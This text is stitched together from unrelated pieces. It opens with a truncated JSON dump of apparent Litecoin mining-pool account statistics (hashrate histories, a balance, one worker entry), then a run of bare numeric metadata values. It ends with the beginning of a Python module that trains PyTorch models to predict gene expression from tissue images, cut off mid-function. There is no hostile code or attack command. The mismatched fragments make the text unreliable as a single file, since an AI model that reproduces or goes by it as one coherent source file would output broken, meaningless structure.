"2019-12-01T15:30:00Z": 0, "2019-12-01T15:40:00Z": 0, "2019-12-01T15:50:00Z": 0, "2019-12-01T16:00:00Z": 0, "2019-12-01T16:10:00Z": 0, "2019-12-01T16:20:00Z": 0, "2019-12-01T16:30:00Z": 0, "2019-12-01T16:40:00Z": 0, "2019-12-01T16:50:00Z": 0, "2019-12-01T17:00:00Z": 0, "2019-12-01T17:10:00Z": 0, "2019-12-01T17:20:00Z": 0, "2019-12-01T17:30:00Z": 0, "2019-12-01T17:40:00Z": 0, "2019-12-01T17:50:00Z": 0, "2019-12-01T18:00:00Z": 0, "2019-12-01T18:10:00Z": 0, "2019-12-01T18:20:00Z": 0}, "hashrate_history_local": {"2019-11-30T18:30:00Z": 0, "2019-11-30T18:40:00Z": 0, "2019-11-30T18:50:00Z": 0, "2019-11-30T19:00:00Z": 0, "2019-11-30T19:10:00Z": 0, "2019-11-30T19:20:00Z": 0, "2019-11-30T19:30:00Z": 0, "2019-11-30T19:40:00Z": 0, "2019-11-30T19:50:00Z": 0, "2019-11-30T20:00:00Z": 0, "2019-11-30T20:10:00Z": 0, "2019-11-30T20:20:00Z": 0, "2019-11-30T20:30:00Z": 0, "2019-11-30T20:40:00Z": 0, "2019-11-30T20:50:00Z": 0, "2019-11-30T21:00:00Z": 0, "2019-11-30T21:10:00Z": 0, "2019-11-30T21:20:00Z": 0, "2019-11-30T21:30:00Z": 0, "2019-11-30T21:40:00Z": 0, "2019-11-30T21:50:00Z": 0, "2019-11-30T22:00:00Z": 0, "2019-11-30T22:10:00Z": 0, "2019-11-30T22:20:00Z": 0, "2019-11-30T22:30:00Z": 0, "2019-11-30T22:40:00Z": 0, "2019-11-30T22:50:00Z": 0, "2019-11-30T23:00:00Z": 0, "2019-11-30T23:10:00Z": 0, "2019-11-30T23:20:00Z": 0, "2019-11-30T23:30:00Z": 0, "2019-11-30T23:40:00Z": 0, "2019-11-30T23:50:00Z": 0, "2019-12-01T00:00:00Z": 0, "2019-12-01T00:10:00Z": 0, "2019-12-01T00:20:00Z": 0, "2019-12-01T00:30:00Z": 0, "2019-12-01T00:40:00Z": 0, "2019-12-01T00:50:00Z": 0, "2019-12-01T01:00:00Z": 0, "2019-12-01T01:10:00Z": 0, "2019-12-01T01:20:00Z": 0, "2019-12-01T01:30:00Z": 0, "2019-12-01T01:40:00Z": 0, "2019-12-01T01:50:00Z": 0, "2019-12-01T02:00:00Z": 0, "2019-12-01T02:10:00Z": 0, "2019-12-01T02:20:00Z": 0, "2019-12-01T02:30:00Z": 0, "2019-12-01T02:40:00Z": 0, "2019-12-01T02:50:00Z": 0, "2019-12-01T03:00:00Z": 0, "2019-12-01T03:10:00Z": 0, "2019-12-01T03:20:00Z": 0, "2019-12-01T03:30:00Z": 0, "2019-12-01T03:40:00Z": 0, "2019-12-01T03:50:00Z": 0, "2019-12-01T04:00:00Z": 0, "2019-12-01T04:10:00Z": 0, "2019-12-01T04:20:00Z": 0, "2019-12-01T04:30:00Z": 0, "2019-12-01T04:40:00Z": 0, "2019-12-01T04:50:00Z": 0, "2019-12-01T05:00:00Z": 0, "2019-12-01T05:10:00Z": 0, "2019-12-01T05:20:00Z": 0, "2019-12-01T05:30:00Z": 0, "2019-12-01T05:40:00Z": 0, "2019-12-01T05:50:00Z": 0, "2019-12-01T06:00:00Z": 0, "2019-12-01T06:10:00Z": 0, "2019-12-01T06:20:00Z": 0, "2019-12-01T06:30:00Z": 0, "2019-12-01T06:40:00Z": 0, "2019-12-01T06:50:00Z": 0, "2019-12-01T07:00:00Z": 0, "2019-12-01T07:10:00Z": 0, "2019-12-01T07:20:00Z": 0, "2019-12-01T07:30:00Z": 0, "2019-12-01T07:40:00Z": 0, "2019-12-01T07:50:00Z": 0, "2019-12-01T08:00:00Z": 0, "2019-12-01T08:10:00Z": 0, "2019-12-01T08:20:00Z": 0, "2019-12-01T08:30:00Z": 0, "2019-12-01T08:40:00Z": 0, "2019-12-01T08:50:00Z": 0, "2019-12-01T09:00:00Z": 0, "2019-12-01T09:10:00Z": 0, "2019-12-01T09:20:00Z": 0, "2019-12-01T09:30:00Z": 0, "2019-12-01T09:40:00Z": 0, "2019-12-01T09:50:00Z": 0, "2019-12-01T10:00:00Z": 0, "2019-12-01T10:10:00Z": 0, "2019-12-01T10:20:00Z": 0, "2019-12-01T10:30:00Z": 0, "2019-12-01T10:40:00Z": 0, "2019-12-01T10:50:00Z": 0, "2019-12-01T11:00:00Z": 0, "2019-12-01T11:10:00Z": 0, "2019-12-01T11:20:00Z": 0, "2019-12-01T11:30:00Z": 0, "2019-12-01T11:40:00Z": 0, "2019-12-01T11:50:00Z": 0, "2019-12-01T12:00:00Z": 0, "2019-12-01T12:10:00Z": 0, "2019-12-01T12:20:00Z": 0, "2019-12-01T12:30:00Z": 0, "2019-12-01T12:40:00Z": 0, "2019-12-01T12:50:00Z": 0, "2019-12-01T13:00:00Z": 0, "2019-12-01T13:10:00Z": 0, "2019-12-01T13:20:00Z": 0, "2019-12-01T13:30:00Z": 0, "2019-12-01T13:40:00Z": 0, "2019-12-01T13:50:00Z": 0, "2019-12-01T14:00:00Z": 0, "2019-12-01T14:10:00Z": 0, "2019-12-01T14:20:00Z": 0, "2019-12-01T14:30:00Z": 0, "2019-12-01T14:40:00Z": 0, "2019-12-01T14:50:00Z": 0, "2019-12-01T15:00:00Z": 0, "2019-12-01T15:10:00Z": 0, "2019-12-01T15:20:00Z": 0, "2019-12-01T15:30:00Z": 0, "2019-12-01T15:40:00Z": 0, "2019-12-01T15:50:00Z": 0, "2019-12-01T16:00:00Z": 0, "2019-12-01T16:10:00Z": 0, "2019-12-01T16:20:00Z": 0, "2019-12-01T16:30:00Z": 0, "2019-12-01T16:40:00Z": 0, "2019-12-01T16:50:00Z": 0, "2019-12-01T17:00:00Z": 0, "2019-12-01T17:10:00Z": 0, "2019-12-01T17:20:00Z": 0, "2019-12-01T17:30:00Z": 0, "2019-12-01T17:40:00Z": 0, "2019-12-01T17:50:00Z": 0, "2019-12-01T18:00:00Z": 0, "2019-12-01T18:10:00Z": 0, "2019-12-01T18:20:00Z": 0}},
'/litecoin/holitics' : {"balance": 0.002640930837514650, "hashes_last_day": 2937757630464, "hashes_last_hour": 0, "hashrate": 0, "hashrate_history": {"2019-11-30T19:40:00Z": 372230499, "2019-11-30T19:50:00Z": 272014595, "2019-11-30T20:00:00Z": 300647711, "2019-11-30T20:10:00Z": 200431807, "2019-11-30T20:20:00Z": 286331153, "2019-11-30T20:30:00Z": 229064922, "2019-11-30T20:40:00Z": 229064922, "2019-11-30T20:50:00Z": 314964268, "2019-11-30T21:00:00Z": 272014595, "2019-11-30T21:10:00Z": 229064922, "2019-11-30T21:20:00Z": 143165577, "2019-11-30T21:30:00Z": 164640413, "2019-11-30T21:40:00Z": 243381480, "2019-11-30T21:50:00Z": 114532461, "2019-11-30T22:00:00Z": 186115249, "2019-11-30T22:10:00Z": 171798692, "2019-11-30T22:20:00Z": 229064922, "2019-11-30T22:30:00Z": 293489432, "2019-11-30T22:40:00Z": 314964268, "2019-11-30T22:50:00Z": 214748365, "2019-11-30T23:00:00Z": 200431807, "2019-11-30T23:10:00Z": 257698038, "2019-11-30T23:20:00Z": 28633115, "2019-11-30T23:30:00Z": 0, "2019-11-30T23:40:00Z": 0, "2019-11-30T23:50:00Z": 0, "2019-12-01T00:00:00Z": 0, "2019-12-01T00:10:00Z": 0, "2019-12-01T00:20:00Z": 0, "2019-12-01T00:30:00Z": 0, "2019-12-01T00:40:00Z": 0, "2019-12-01T00:50:00Z": 0, "2019-12-01T01:00:00Z": 0, "2019-12-01T01:10:00Z": 0, "2019-12-01T01:20:00Z": 0, "2019-12-01T01:30:00Z": 0, "2019-12-01T01:40:00Z": 0, "2019-12-01T01:50:00Z": 0, "2019-12-01T02:00:00Z": 0, "2019-12-01T02:10:00Z": 0, "2019-12-01T02:20:00Z": 0, "2019-12-01T02:30:00Z": 0, "2019-12-01T02:40:00Z": 0, "2019-12-01T02:50:00Z": 0, "2019-12-01T03:00:00Z": 0, "2019-12-01T03:10:00Z": 0, "2019-12-01T03:20:00Z": 0, "2019-12-01T03:30:00Z": 0, "2019-12-01T03:40:00Z": 0, "2019-12-01T03:50:00Z": 0, "2019-12-01T04:00:00Z": 0, "2019-12-01T04:10:00Z": 0, "2019-12-01T04:20:00Z": 0, "2019-12-01T04:30:00Z": 0, "2019-12-01T04:40:00Z": 0, "2019-12-01T04:50:00Z": 0, "2019-12-01T05:00:00Z": 0, "2019-12-01T05:10:00Z": 0, "2019-12-01T05:20:00Z": 0, "2019-12-01T05:30:00Z": 0, "2019-12-01T05:40:00Z": 0, "2019-12-01T05:50:00Z": 0, "2019-12-01T06:00:00Z": 0, "2019-12-01T06:10:00Z": 0, "2019-12-01T06:20:00Z": 0, "2019-12-01T06:30:00Z": 0, "2019-12-01T06:40:00Z": 0, "2019-12-01T06:50:00Z": 0, "2019-12-01T07:00:00Z": 0, "2019-12-01T07:10:00Z": 0, "2019-12-01T07:20:00Z": 0, "2019-12-01T07:30:00Z": 0, "2019-12-01T07:40:00Z": 0, "2019-12-01T07:50:00Z": 0, "2019-12-01T08:00:00Z": 0, "2019-12-01T08:10:00Z": 0, "2019-12-01T08:20:00Z": 0, "2019-12-01T08:30:00Z": 0, "2019-12-01T08:40:00Z": 0, "2019-12-01T08:50:00Z": 0, "2019-12-01T09:00:00Z": 0, "2019-12-01T09:10:00Z": 0, "2019-12-01T09:20:00Z": 0, "2019-12-01T09:30:00Z": 0, "2019-12-01T09:40:00Z": 0, "2019-12-01T09:50:00Z": 0, "2019-12-01T10:00:00Z": 0, "2019-12-01T10:10:00Z": 0, "2019-12-01T10:20:00Z": 0, "2019-12-01T10:30:00Z": 0, "2019-12-01T10:40:00Z": 0, "2019-12-01T10:50:00Z": 0, "2019-12-01T11:00:00Z": 0, "2019-12-01T11:10:00Z": 0, "2019-12-01T11:20:00Z": 0, "2019-12-01T11:30:00Z": 0, "2019-12-01T11:40:00Z": 0, "2019-12-01T11:50:00Z": 0, "2019-12-01T12:00:00Z": 0, "2019-12-01T12:10:00Z": 0, "2019-12-01T12:20:00Z": 0, "2019-12-01T12:30:00Z": 0, "2019-12-01T12:40:00Z": 0, "2019-12-01T12:50:00Z": 0, "2019-12-01T13:00:00Z": 0, "2019-12-01T13:10:00Z": 0, "2019-12-01T13:20:00Z": 0, "2019-12-01T13:30:00Z": 0, "2019-12-01T13:40:00Z": 0, "2019-12-01T13:50:00Z": 0, "2019-12-01T14:00:00Z": 0, "2019-12-01T14:10:00Z": 0, "2019-12-01T14:20:00Z": 0, "2019-12-01T14:30:00Z": 0, "2019-12-01T14:40:00Z": 0, "2019-12-01T14:50:00Z": 0, "2019-12-01T15:00:00Z": 0, "2019-12-01T15:10:00Z": 0, "2019-12-01T15:20:00Z": 0, "2019-12-01T15:30:00Z": 0, "2019-12-01T15:40:00Z": 0, "2019-12-01T15:50:00Z": 0, "2019-12-01T16:00:00Z": 0, "2019-12-01T16:10:00Z": 0, "2019-12-01T16:20:00Z": 0, "2019-12-01T16:30:00Z": 0, "2019-12-01T16:40:00Z": 0, "2019-12-01T16:50:00Z": 0, "2019-12-01T17:00:00Z": 0, "2019-12-01T17:10:00Z": 0, "2019-12-01T17:20:00Z": 0, "2019-12-01T17:30:00Z": 0, "2019-12-01T17:40:00Z": 0, "2019-12-01T17:50:00Z": 0, "2019-12-01T18:00:00Z": 0, "2019-12-01T18:10:00Z": 0, "2019-12-01T18:20:00Z": 0, "2019-12-01T18:30:00Z": 0, "2019-12-01T18:40:00Z": 0, "2019-12-01T18:50:00Z": 0, "2019-12-01T19:00:00Z": 0, "2019-12-01T19:10:00Z": 0, "2019-12-01T19:20:00Z": 0, "2019-12-01T19:30:00Z": 0}, "hashrate_history_local": {"2019-11-30T19:40:00Z": 0, "2019-11-30T19:50:00Z": 0, "2019-11-30T20:00:00Z": 0, "2019-11-30T20:10:00Z": 0, "2019-11-30T20:20:00Z": 0, "2019-11-30T20:30:00Z": 0, "2019-11-30T20:40:00Z": 0, "2019-11-30T20:50:00Z": 0, "2019-11-30T21:00:00Z": 0, "2019-11-30T21:10:00Z": 0, "2019-11-30T21:20:00Z": 0, "2019-11-30T21:30:00Z": 0, "2019-11-30T21:40:00Z": 0, "2019-11-30T21:50:00Z": 0, "2019-11-30T22:00:00Z": 0, "2019-11-30T22:10:00Z": 0, "2019-11-30T22:20:00Z": 0, "2019-11-30T22:30:00Z": 0, "2019-11-30T22:40:00Z": 0, "2019-11-30T22:50:00Z": 0, "2019-11-30T23:00:00Z": 0, "2019-11-30T23:10:00Z": 0, "2019-11-30T23:20:00Z": 0, "2019-11-30T23:30:00Z": 0, "2019-11-30T23:40:00Z": 0, "2019-11-30T23:50:00Z": 0, "2019-12-01T00:00:00Z": 0, "2019-12-01T00:10:00Z": 0, "2019-12-01T00:20:00Z": 0, "2019-12-01T00:30:00Z": 0, "2019-12-01T00:40:00Z": 0, "2019-12-01T00:50:00Z": 0, "2019-12-01T01:00:00Z": 0, "2019-12-01T01:10:00Z": 0, "2019-12-01T01:20:00Z": 0, "2019-12-01T01:30:00Z": 0, "2019-12-01T01:40:00Z": 0, "2019-12-01T01:50:00Z": 0, "2019-12-01T02:00:00Z": 0, "2019-12-01T02:10:00Z": 0, "2019-12-01T02:20:00Z": 0, "2019-12-01T02:30:00Z": 0, "2019-12-01T02:40:00Z": 0, "2019-12-01T02:50:00Z": 0, "2019-12-01T03:00:00Z": 0, "2019-12-01T03:10:00Z": 0, "2019-12-01T03:20:00Z": 0, "2019-12-01T03:30:00Z": 0, "2019-12-01T03:40:00Z": 0, "2019-12-01T03:50:00Z": 0, "2019-12-01T04:00:00Z": 0, "2019-12-01T04:10:00Z": 0, "2019-12-01T04:20:00Z": 0, "2019-12-01T04:30:00Z": 0, "2019-12-01T04:40:00Z": 0, "2019-12-01T04:50:00Z": 0, "2019-12-01T05:00:00Z": 0, "2019-12-01T05:10:00Z": 0, "2019-12-01T05:20:00Z": 0, "2019-12-01T05:30:00Z": 0, "2019-12-01T05:40:00Z": 0, "2019-12-01T05:50:00Z": 0, "2019-12-01T06:00:00Z": 0, "2019-12-01T06:10:00Z": 0, "2019-12-01T06:20:00Z": 0, "2019-12-01T06:30:00Z": 0, "2019-12-01T06:40:00Z": 0, "2019-12-01T06:50:00Z": 0, "2019-12-01T07:00:00Z": 0, "2019-12-01T07:10:00Z": 0, "2019-12-01T07:20:00Z": 0, "2019-12-01T07:30:00Z": 0, "2019-12-01T07:40:00Z": 0, "2019-12-01T07:50:00Z": 0, "2019-12-01T08:00:00Z": 0, "2019-12-01T08:10:00Z": 0, "2019-12-01T08:20:00Z": 0, "2019-12-01T08:30:00Z": 0, "2019-12-01T08:40:00Z": 0, "2019-12-01T08:50:00Z": 0, "2019-12-01T09:00:00Z": 0, "2019-12-01T09:10:00Z": 0, "2019-12-01T09:20:00Z": 0, "2019-12-01T09:30:00Z": 0, "2019-12-01T09:40:00Z": 0, "2019-12-01T09:50:00Z": 0, "2019-12-01T10:00:00Z": 0, "2019-12-01T10:10:00Z": 0, "2019-12-01T10:20:00Z": 0, "2019-12-01T10:30:00Z": 0, "2019-12-01T10:40:00Z": 0, "2019-12-01T10:50:00Z": 0, "2019-12-01T11:00:00Z": 0, "2019-12-01T11:10:00Z": 0, "2019-12-01T11:20:00Z": 0, "2019-12-01T11:30:00Z": 0, "2019-12-01T11:40:00Z": 0, "2019-12-01T11:50:00Z": 0, "2019-12-01T12:00:00Z": 0, "2019-12-01T12:10:00Z": 0, "2019-12-01T12:20:00Z": 0, "2019-12-01T12:30:00Z": 0, "2019-12-01T12:40:00Z": 0, "2019-12-01T12:50:00Z": 0, "2019-12-01T13:00:00Z": 0, "2019-12-01T13:10:00Z": 0, "2019-12-01T13:20:00Z": 0, "2019-12-01T13:30:00Z": 0, "2019-12-01T13:40:00Z": 0, "2019-12-01T13:50:00Z": 0, "2019-12-01T14:00:00Z": 0, "2019-12-01T14:10:00Z": 0, "2019-12-01T14:20:00Z": 0, "2019-12-01T14:30:00Z": 0, "2019-12-01T14:40:00Z": 0, "2019-12-01T14:50:00Z": 0, "2019-12-01T15:00:00Z": 0, "2019-12-01T15:10:00Z": 0, "2019-12-01T15:20:00Z": 0, "2019-12-01T15:30:00Z": 0, "2019-12-01T15:40:00Z": 0, "2019-12-01T15:50:00Z": 0, "2019-12-01T16:00:00Z": 0, "2019-12-01T16:10:00Z": 0, "2019-12-01T16:20:00Z": 0, "2019-12-01T16:30:00Z": 0, "2019-12-01T16:40:00Z": 0, "2019-12-01T16:50:00Z": 0, "2019-12-01T17:00:00Z": 0, "2019-12-01T17:10:00Z": 0, "2019-12-01T17:20:00Z": 0, "2019-12-01T17:30:00Z": 0, "2019-12-01T17:40:00Z": 0, "2019-12-01T17:50:00Z": 0, "2019-12-01T18:00:00Z": 0, "2019-12-01T18:10:00Z": 0, "2019-12-01T18:20:00Z": 0, "2019-12-01T18:30:00Z": 0, "2019-12-01T18:40:00Z": 0, "2019-12-01T18:50:00Z": 0, "2019-12-01T19:00:00Z": 0, "2019-12-01T19:10:00Z": 0, "2019-12-01T19:20:00Z": 0, "2019-12-01T19:30:00Z": 0}, "last": {}, "local_hash": 0, "paid": 0, "payout_history": [], "stale_hashes_rejected_last_day": 0, "stale_hashes_rejected_last_hour": 0, "value": 0.002640930837514650, "value_change": 0E-18, "value_last_day": 0.001432999219104999, "worker_length": 1, "worker_length_online": 0, "workers": [["001", 272014595, 0, 0, 2937757630464, 0, "2019-11-30T23:20:44.909751Z", False, 0]]}
}
| 2,788.5
| 8,515
| 0.642101
| 3,557
| 16,731
| 3.012932
| 0.028114
| 0.195204
| 0.387422
| 0.427358
| 0.953905
| 0.929924
| 0.929924
| 0.925632
| 0.925632
| 0.925632
| 0
| 0.593373
| 0.072799
| 16,731
| 6
| 8,516
| 2,788.5
| 0.097467
| 0
| 0
| 0
| 0
| 0
| 0.713722
| 0.01279
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 14
|
79b7120f280e769926784cce029618e73e099d1b
| 68,162
|
py
|
Python
|
executionModule.py
|
RoyRGitHub/STDL-Project
|
bae689ea12682bb60f6e1ed19677d2ae2238cda7
|
[
"Unlicense"
] | 1
|
2020-10-05T09:11:14.000Z
|
2020-10-05T09:11:14.000Z
|
executionModule.py
|
RoyRGitHub/STDL-Project
|
bae689ea12682bb60f6e1ed19677d2ae2238cda7
|
[
"Unlicense"
] | null | null | null |
executionModule.py
|
RoyRGitHub/STDL-Project
|
bae689ea12682bb60f6e1ed19677d2ae2238cda7
|
[
"Unlicense"
] | null | null | null |
import torch
from torch.utils.data import Dataset, DataLoader
from torch.utils.data import random_split
import torchvision
import numpy as np
import pandas as pd
from sklearn.decomposition import NMF
from deepNetworkArchitechture import *
from projectUtilities import *
import matplotlib
matplotlib.use('Agg') # TODO: delete later if you want to use plot in jupyter notebook
from matplotlib import pyplot as plt
import seaborn as sns
from numpy import savetxt
###def train_prediction_model(model_to_train, ds_train, dl_train, loss_fn, optimizer, num_of_epochs_wanted, max_alowed_number_of_batches, device): ### TODO delete if not needed
def train_prediction_model(model_to_train, ds_train, loss_fn, optimizer, hyperparams, model_name, dataset_name, device):
'''
This is the main function for training our models.
'''
print("/ * \ ENTERED train_prediction_model / * \ ")
'''
preparations
'''
# for me - name changing
num_of_epochs = hyperparams['num_of_epochs']
max_alowed_number_of_batches = hyperparams['max_alowed_number_of_batches']
model = model_to_train
# create a SHUFFLING (!) dataloader
dl_train = DataLoader(ds_train, batch_size=hyperparams['batch_size'], num_workers=hyperparams['num_workers'] , shuffle=True) # NOTE: shuffle = TRUE !!!
# important: load model to cuda
if device.type == 'cuda':
model = model.to(device=device)
# compute actual number of batches to train on in each epoch
num_of_batches = (len(ds_train) // dl_train.batch_size)
if num_of_batches > max_alowed_number_of_batches:
print(f'NOTE: in order to speed up training (while damaging accuracy) the number of batches per epoch was reduced from {num_of_batches} to {max_alowed_number_of_batches}')
num_of_batches = max_alowed_number_of_batches
else:
# make sure there are no leftover datapoints not used because of "//"" calculation above
if (len(ds_train) % dl_train.batch_size) != 0:
num_of_batches = num_of_batches + 1
'''
BEGIN TRAINING !!!
# note 2 loops here: external (epochs) and internal (batches)
'''
print("****** begin training ******")
loss_value_averages_of_all_epochs = []
for iteration in range(num_of_epochs):
print(f'iteration {iteration+1} of {num_of_epochs} epochs') # TODO: comment this line if working on notebook
# init variables for external loop
dl_iter = iter(dl_train) # iterator over the dataloader. called only once, outside of the loop, and from then on we use next() on that iterator
loss_values_list = []
for batch_index in range(num_of_batches):
#print(f'iteration {iteration+1} of {num_of_epochs} epochs: batch {batch_index+1} of {num_of_batches} batches', end='\r') # "end='\r'" will cause the line to be overwritten the next print that comes
# # NOTE: this only works in the notebook - # TODO uncomment this line when working on notebook
# get current batch data
data = next(dl_iter) # note: "data" variable is a list with 3 elements
# x, y, _ = data # TODO: NOTE this is changed in 191120 to the following 2 lines below
# note : x.shape is: torch.Size([25, 3, 176, 176]) y.shape is: torch.Size([25]) because the batch size is 25.
# NOTE that the third argument recieved here is "column" and is not currently needed
x = data[0] # TODO NOTE: changed in 191120 because there is no 3rd argument in the new mandalay version
y = data[1] # TODO NOTE: changed in 191120 because there is no 3rd argument in the new mandalay version
# load to device
if device.type == 'cuda':
x = x.to(device=device)
y = y.to(device=device)
# Forward pass: compute predicted y by passing x to the model.
y_pred = model(x)
# load to device
y_pred = y_pred.squeeze() #NOTE !!!!!!! probably needed for the single gene prediction later on
# Compute (and save) loss.
loss = loss_fn(y_pred, y)
loss_values_list.append(loss.item())
# Before the backward pass, use the optimizer object to zero all of the gradients for the variables it will update (which are the learnable
# weights of the model). This is because by default, gradients are accumulated in buffers( i.e, not overwritten)
# whenever ".backward()" is called. Checkout docs of torch.autograd.backward for more details.
optimizer.zero_grad()
# Backward pass: compute gradient of the loss with respect to model parameters
loss.backward()
# Calling the step function on an Optimizer makes an update to its parameters
optimizer.step()
# delete unneeded tesnors from GPU to save space
del x, y
##end of inner loop
# print(f'\nfinished inner loop.')
# data prints on the epoch that ended
# print(f'in this epoch: min loss {np.min(loss_values_list)} max loss {np.max(loss_values_list)}')
# print(f' average loss {np.mean(loss_values_list)}')
average_value_this_epoch = np.mean(loss_values_list)
# print(f'in this epoch: average loss {average_value_this_epoch}')
loss_value_averages_of_all_epochs.append(average_value_this_epoch)
print(f'finished all epochs ! ') # spaces ARE intended
print(f'which means, that this model is now trained.')
print(f'plotting the loss convergence for the training of this model: ')
plot_loss_convergence(loss_value_averages_of_all_epochs, model_name, dataset_name) #TODO: temporarily commented during 201120 mandalay data experimentation (this function occurs more times than before and each time runs ove existing object)
print(" \ * / FINISHED train_prediction_model \ * / ")
return model
def runExperiment(ds_train : Dataset, ds_test : Dataset, hyperparams, device, model_name, dataset_name):
'''
**runExperimentWithModel_BasicConvNet**
this function performs 2 things:
(1) Trains the model on patient 1 data (train data)
(2) Tests the model on patient 2 data (test data)
'''
print("\n----- entered function runExperiment -----")
'''
prepare model, loss and optimizer instances
'''
# create the model
model = get_model_by_name(name=model_name, dataset=ds_train, hyperparams=hyperparams)
# create the loss function and optimizer
loss_fn = torch.nn.MSELoss()
optimizer = torch.optim.Adam(model.parameters(), lr=hyperparams['learning_rate'])
'''
Train the model
'''
# TODO: delete if not needed
# dl_train = DataLoader(ds_train, hyperparams['batch_size'], shuffle=True)
# trained_model = train_prediction_model(model_to_train=model, ds_train=ds_train, dl_train=dl_train, loss_fn=loss_fn,
# optimizer=optimizer, num_of_epochs_wanted=hyperparams['num_of_epochs'],
# max_alowed_number_of_batches=hyperparams['max_alowed_number_of_batches'],
# device=device)
trained_model = train_prediction_model(model_to_train=model, ds_train=ds_train, loss_fn=loss_fn,
optimizer=optimizer, hyperparams=hyperparams,
model_name=model_name, dataset_name=dataset_name, device=device)
'''
Test the model by its type on the train and test datasets, and print comparisons
NOTE: in the K genes experiments the matrices are of shape (num of samples, k)
BUT in NMF and AE the matrices are TRANSPOSED and are of shape (num of genes, num of samples)
'''
if dataset_name.startswith("single_gene"):
## perform on TRAIN data
print("\n## perform on TRAIN data ##")
M_truth, M_pred = getSingleDimPrediction(dataset=ds_train, model=trained_model, device=device)
baseline = np.full(shape=M_truth.shape, fill_value=np.average(M_truth)) # `full` creates an array of wanted size where all values are the same fill value
compare_matrices(M_truth, M_pred, Baseline=baseline)
plot_SingleGene_PredAndTrue_ScatterComparison(ds_train, M_pred, M_truth, model_name, dataset_name + ' Train', hyperparams['gene_name'])
plot_SingleGene_PredAndTrue_ColorVisualisation(ds_train, M_pred, M_truth, model_name, dataset_name + ' Train', hyperparams['gene_name'])
# perform on TEST data
print("\n## perform on TEST data ##")
M_truth_test, M_pred_test = getSingleDimPrediction(dataset=ds_test, model=trained_model, device=device)
baseline = np.full(shape=M_truth_test.shape, fill_value=np.average(M_truth)) #NOTE: shape of TEST data, filled with TRAIN data avg !!! # `full` creates an array of wanted size where all values are the same fill value
compare_matrices(M_truth_test, M_pred_test, Baseline=baseline) #NOTE: same baseline as above - the TRAIN baseline
plot_SingleGene_PredAndTrue_ScatterComparison(ds_test, M_pred_test, M_truth_test, model_name, dataset_name + ' Test', hyperparams['gene_name'])
plot_SingleGene_PredAndTrue_ColorVisualisation(ds_test, M_pred_test, M_truth_test, model_name, dataset_name + ' Test', hyperparams['gene_name'])
print("\n## VERIFICATIONS 091020 ##") #TODO: delete later
# save to csv file
savetxt('single_gene_test_pred_from_K_genes_exp.csv', M_pred_test, delimiter=',')
elif dataset_name.startswith("k_genes"):
#
train_gene_index = ds_train.mapping.index[ds_train.mapping['original_index_from_matrix_dataframe'] == hyperparams['geneRowIndexIn_Reduced_Train_matrix_df']].item()
test_gene_index = ds_test.mapping.index[ds_test.mapping['original_index_from_matrix_dataframe'] == hyperparams['geneRowIndexIn_Reduced_Test_matrix_df']].item()
### perform on TRAIN data ###
print("\n## perform on TRAIN data ##")
M_truth, M_pred = getKDimPrediction(dataset=ds_train, model=trained_model, device=device)
print("matrix comparsions on all K genes ...")
num_rows = M_truth.shape[0]
baseline = np.tile(A=np.average(M_truth, axis=0), reps=(num_rows,1)) # create an average of every gene's value on all of the samples - then multiply the result in the num of samples. meaning, each sample has the average value of each gene
compare_matrices(M_truth, M_pred, Baseline=baseline)
print("results plot & vector comparsions on the chosen single gene ...")
M_pred_single_gene = M_pred[:,train_gene_index].squeeze()
M_truth_single_gene = M_truth[:,train_gene_index].squeeze()
baseline_single_gene = baseline[:,train_gene_index].squeeze()
compare_matrices(M_truth_single_gene, M_pred_single_gene, Baseline=baseline_single_gene)
plot_SingleGene_PredAndTrue_ScatterComparison(ds_train, M_pred_single_gene, M_truth_single_gene, model_name, dataset_name + ' Train', hyperparams['gene_name'])
plot_SingleGene_PredAndTrue_ColorVisualisation(ds_train, M_pred_single_gene, M_truth_single_gene, model_name, dataset_name + ' Train', hyperparams['gene_name'])
plot_heatmaps(M_pred, M_truth, train_or_test='Train')
### perform on TEST data ###
print("\n## perform on TEST data ##")
M_truth_test, M_pred_test = getKDimPrediction(dataset=ds_test, model=trained_model, device=device)
print("matrix comparsions on all K genes ...")
num_rows = M_truth_test.shape[0]
baseline = np.tile(A=np.average(M_truth, axis=0), reps=(num_rows,1)) # NOTE: this is on TRAIN DATA !!! # create an average of every gene's value on all of the samples - then multiply the result in the num of samples. meaning, each sample has the average value of each gene
compare_matrices(M_truth_test, M_pred_test, Baseline=baseline)
print("results plot & vector comparsions on the chosen single gene ...")
M_pred_single_gene = M_pred_test[:,test_gene_index].squeeze()
M_truth_single_gene = M_truth_test[:,test_gene_index].squeeze()
baseline_single_gene = baseline[:,test_gene_index].squeeze()
compare_matrices(M_truth_single_gene, M_pred_single_gene, Baseline=baseline_single_gene)
plot_SingleGene_PredAndTrue_ScatterComparison(ds_test, M_pred_single_gene, M_truth_single_gene, model_name, dataset_name + ' Test', hyperparams['gene_name'])
plot_SingleGene_PredAndTrue_ColorVisualisation(ds_test, M_pred_single_gene, M_truth_single_gene, model_name, dataset_name + ' Test', hyperparams['gene_name'])
plot_heatmaps(M_pred_test, M_truth_test, train_or_test='Test')
elif dataset_name.startswith("NMF"):
#
train_gene_index = hyperparams['geneRowIndexIn_Reduced_Train_matrix_df']
test_gene_index = hyperparams['geneRowIndexIn_Reduced_Test_matrix_df']
### perform on TRAIN data ###
print("\n## perform on TRAIN data ##")
M_truth, M_pred = getFullDimsPrediction_with_NMF_DS(dataset=ds_train, W=ds_train.W, model=trained_model, device=device)
# train-error comparisons: M_truth ~ M_fast_reconstruction ~ M_pred
# orig_matrix ~ W * H ~ W * H_pred
print("matrix comparsions on all genes ...")
M_fast_reconstruction = np.matmul(ds_train.W, ds_train.H)
compare_matrices(M_truth, M_pred, Baseline=M_fast_reconstruction)
# prepare for the plots of the chosen gene:
print("results plot & vector comparsions on the chosen single gene ...")
M_pred_single_gene = M_pred[train_gene_index,:].transpose().squeeze()
M_truth_single_gene = M_truth[train_gene_index,:].transpose().squeeze()
M_fast_rec_single_gene = M_fast_reconstruction[train_gene_index,:].transpose().squeeze()
compare_matrices(M_truth_single_gene, M_pred_single_gene, Baseline=M_fast_rec_single_gene)
# plot comparisons of M_pred and M_truth
